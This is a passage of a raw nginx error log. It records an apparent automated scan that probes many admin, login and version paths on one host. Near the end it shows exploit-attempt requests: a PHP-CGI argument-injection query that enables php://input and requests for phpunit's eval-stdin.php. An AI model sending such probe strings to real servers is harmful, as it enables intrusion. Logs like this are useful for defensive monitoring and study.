/admin.shtml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 357#357: *217872 open() "/var/www/html/versions" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /versions HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 358#358: *217868 open() "/var/www/html/login/login.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /login/login.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218707 open() "/var/www/html/r-seenet/index.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /r-seenet/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 358#358: *218516 open() "/var/www/html/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218709 open() "/var/www/html/admin.pl" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /admin.pl HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218719 open() "/var/www/html/tos/index.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /tos/index.php?user/login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218718 open() "/var/www/html/api/version" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/version HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218720 open() "/var/www/html/cgi-mod/header_logo.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cgi-mod/header_logo.cgi?size=big HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218723 open() "/var/www/html/start.jsa" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /start.jsa HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218721 open() "/var/www/html/c/login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /c/login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *218722 open() "/var/www/html/login.aspx" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /login.aspx HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 358#358: *218989 open() "/var/www/html/officescan/console/cgi/cgiChkMasterPwd.exe" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /officescan/console/cgi/cgiChkMasterPwd.exe HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [warn] 359#359: 512 worker_connections are not enough, reusing connections +2026/01/17 03:44:57 [error] 357#357: *220587 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /officescan/console/html/localization.js HTTP/1.1", upstream: "http://127.0.0.1:80/officescan/console/html/localization.js", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [warn] 358#358: 512 worker_connections are not enough, reusing connections +2026/01/17 03:44:57 [alert] 358#358: *220706 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /WebApp/js/UI_String.js HTTP/1.1", upstream: "http://127.0.0.1:80/WebApp/js/UI_String.js", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [alert] 359#359: 512 worker_connections are not enough +2026/01/17 03:44:57 [error] 356#356: *220705 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /ise/img/rm-logo_small.png HTTP/1.1", upstream: "http://127.0.0.1:80/ise/img/rm-logo_small.png", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *220710 open() "/var/www/html/IPCamDesc.xml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /IPCamDesc.xml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 359#359: *220708 open() "/var/www/html/cslu/v1/core/conf" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cslu/v1/core/conf HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:57 [error] 358#358: *220714 open() "/var/www/html/api/v1.0/environment" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v1.0/environment HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 357#357: *220716 open() "/var/www/html/allversions" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /allversions HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 357#357: *220718 open() "/var/www/html/config" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /config HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 357#357: *220930 open() "/var/www/html/webui" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /webui HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 359#359: *221511 open() "/var/www/html/admin/reports/updates" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /admin/reports/updates HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 358#358: *221531 open() "/var/www/html/CHANGELOG.txt" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /CHANGELOG.txt HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 359#359: *221540 open() "/var/www/html/pom.xml" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /pom.xml HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 357#357: *222221 open() "/var/www/html/admin/reports/status" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /admin/reports/status HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 357#357: *222225 open() "/var/www/html/webportal.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /webportal.cgi HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:58 [error] 357#357: *222228 "/var/www/html/kylin/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /kylin/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 357#357: *222230 open() "/var/www/html/workplace/home.action" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /workplace/home.action HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 357#357: *222233 open() "/var/www/html/api/v2/about" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v2/about HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 357#357: *222491 "/var/www/html/owa/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /owa/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 356#356: *222514 open() "/var/www/html/health" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /health HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 358#358: *222544 open() "/var/www/html/+CSCOE+/logon.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /+CSCOE+/logon.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 358#358: *223190 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [warn] 359#359: 512 worker_connections are not enough, reusing connections +2026/01/17 03:44:59 [warn] 357#357: 512 worker_connections are not enough, reusing connections +2026/01/17 03:44:59 [alert] 359#359: 512 worker_connections are not enough +2026/01/17 03:44:59 [error] 357#357: *224241 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /css/eonweb.css HTTP/1.1", upstream: "http://127.0.0.1:80/css/eonweb.css", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [alert] 359#359: 512 worker_connections are not enough +2026/01/17 03:44:59 [error] 356#356: *224243 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /phoenix/favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/phoenix/favicon.ico", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [warn] 356#356: 512 worker_connections are not enough, reusing connections +2026/01/17 03:44:59 [error] 359#359: *224254 "/var/www/html/dashboard/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /dashboard/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 358#358: *224252 "/var/www/html/owa/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /owa/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 357#357: *224255 open() "/var/www/html/centreon/api/latest/platform/versions" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /centreon/api/latest/platform/versions HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 356#356: *224260 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 357#357: *224259 open() "/var/www/html/am_bin/amlogin" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /am_bin/amlogin HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:44:59 [error] 357#357: *224261 open() "/var/www/html/system/version/current" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /system/version/current HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:00 [error] 358#358: *224263 open() "/var/www/html/webui/index.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /webui/index.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:00 [error] 357#357: *224267 open() "/var/www/html/api/v1/version" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v1/version HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:00 [error] 359#359: *224467 open() "/var/www/html/app/ui/login.jsp" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /app/ui/login.jsp HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:00 [error] 358#358: *224448 open() "/var/www/html/hx/api/about" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /hx/api/about HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:00 [error] 358#358: *224461 open() "/var/www/html/i18n/component/JS" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /i18n/component/JS HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:00 [error] 357#357: *224270 "/var/www/html/pandora_console/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /pandora_console/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [error] 358#358: *225767 "/var/www/html/login/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /login/?next=/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [warn] 357#357: 512 worker_connections are not enough, reusing connections +2026/01/17 03:45:01 [warn] 358#358: 512 worker_connections are not enough, reusing connections +2026/01/17 03:45:01 [error] 359#359: *227651 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /plugin/webs_model_cfg.js HTTP/1.1", upstream: "http://127.0.0.1:80/plugin/webs_model_cfg.js", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [warn] 359#359: 512 worker_connections are not enough, reusing connections +2026/01/17 03:45:01 [alert] 357#357: 512 worker_connections are not enough +2026/01/17 03:45:01 [error] 358#358: *227725 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /App_Themes/Default/Images/favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/App_Themes/Default/Images/favicon.ico", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [error] 356#356: *227683 upstream prematurely closed connection while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /MagicInfo/config.js HTTP/1.1", upstream: "http://127.0.0.1:80/MagicInfo/config.js", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [error] 356#356: *227730 open() "/var/www/html/rs/application-about" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /rs/application-about HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [error] 356#356: *227731 open() "/var/www/html/Main_Login.asp" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /Main_Login.asp HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [error] 356#356: *227738 open() "/var/www/html/cgi-bin/luci" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:01 [error] 357#357: *227739 open() "/var/www/html/json/login_session" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /json/login_session HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:02 [error] 356#356: *229110 open() "/var/www/html/nidp/app/login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /nidp/app/login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:02 [error] 356#356: *229234 open() "/var/www/html/main/main.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /main/main.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:02 [error] 356#356: *229242 open() "/var/www/html/ui/login.action" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /ui/login.action HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:02 [error] 359#359: *229243 open() "/var/www/html/metrics" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /metrics HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:02 [error] 357#357: *229803 open() "/var/www/html/login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:02 [error] 358#358: *230590 open() "/var/www/html/api/v2/hoverfly/version" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v2/hoverfly/version HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:02 [error] 356#356: *230611 open() "/var/www/html/about" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /about HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230739 "/var/www/html/core/auth/login/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /core/auth/login/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230745 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230746 open() "/var/www/html/api/status" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/status HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230752 open() "/var/www/html/config_dump" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /config_dump HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230754 open() "/var/www/html/mailinspector/login.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /mailinspector/login.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230758 open() "/var/www/html/agc/vicidial.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /agc/vicidial.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230756 open() "/var/www/html/api/v1/info" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v1/info HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 356#356: *230760 open() "/var/www/html/agent/vicidial.php" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /agent/vicidial.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:03 [error] 358#358: *230850 open() "/var/www/html/index.do" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /index.do HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *232159 open() "/var/www/html/AppsHome.do" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /AppsHome.do HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 359#359: *232178 open() "/var/www/html/system/gwinfo" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /system/gwinfo HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *232257 open() "/var/www/html/decisioncenter-api/v1/about" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /decisioncenter-api/v1/about HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 357#357: *232259 open() "/var/www/html/openapi.json" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /openapi.json HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 357#357: *232270 open() "/var/www/html/nifi-api/flow/about" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /nifi-api/flow/about HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *232271 open() "/var/www/html/jtcgi/wte.pyc" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /jtcgi/wte.pyc HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *232273 open() "/var/www/html/index.lua" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /index.lua HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *232275 "/var/www/html/nifi/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /nifi/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *232277 open() "/var/www/html/info.htm" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /info.htm HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 356#356: *232938 open() "/var/www/html/api-description" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api-description HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *233036 open() "/var/www/html/~login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /~login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 358#358: *233294 open() "/var/www/html/cgi-bin/meteobridge.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/meteobridge.cgi HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:04 [error] 357#357: *233764 open() "/var/www/html/v2" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /v2 HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:05 [error] 358#358: *233781 open() "/var/www/html/wp-content/plugins/post-smtp/readme.txt" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/post-smtp/readme.txt HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:05 [error] 357#357: *233782 open() "/var/www/html/monitor/index.php/auth/login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /monitor/index.php/auth/login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:05 [error] 357#357: *233786 open() "/var/www/html/build.gradle" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /build.gradle HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:05 [error] 358#358: *233787 open() "/var/www/html/management/v1/cluster/state" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /management/v1/cluster/state HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:06 [error] 357#357: *233790 open() "/var/www/html/ignite" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /ignite?cmd=version HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:06 [error] 359#359: *234397 open() "/var/www/html/browser/index.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /browser/index.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:06 [error] 356#356: *235285 open() "/var/www/html/api/v2.0/systeminfo" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v2.0/systeminfo HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:06 [error] 359#359: *235290 open() "/var/www/html/api/v1/cluster/summary" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v1/cluster/summary HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:06 [error] 357#357: *235289 open() "/var/www/html/sys/en/neoclassic/login/login" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /sys/en/neoclassic/login/login HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:06 [error] 359#359: *235288 open() "/var/www/html/cgi-bin/getagent.cgi" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/getagent.cgi?type=s HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 356#356: *235293 open() "/var/www/html/nmc/rss/server" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /nmc/rss/server HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 358#358: *235488 open() "/var/www/html/sap/bc/ui2/flp" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /sap/bc/ui2/flp HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 359#359: *235906 "/var/www/html/download/python/index.html" is not found (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /download/python/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 359#359: *235902 open() "/var/www/html/api/system/status" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/system/status HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 357#357: *236212 open() "/var/www/html/webpages/login.html" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /webpages/login.html HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 357#357: *237111 open() "/var/www/html/sms_mp/.sms_aut" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /sms_mp/.sms_aut?mplist HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 359#359: *237124 open() "/var/www/html/rest/settings" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /rest/settings HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 357#357: *238298 open() "/var/www/html/api/v3/meta" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /api/v3/meta HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 357#357: *238299 open() "/var/www/html/admin" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /admin HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 357#357: *238301 open() "/var/www/html/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 03:45:07 [error] 357#357: *238302 open() "/var/www/html/ScadaBR/login.htm" failed (2: No such file or directory), client: 172.234.162.31, server: localhost-nginx-proxy-manager, request: "GET /ScadaBR/login.htm HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/17 04:51:31 [error] 364#364: *239911 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:20 [error] 363#363: *239916 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:24 [error] 363#363: *239916 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:25 [error] 363#363: *239916 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:26 [error] 363#363: *239916 open() 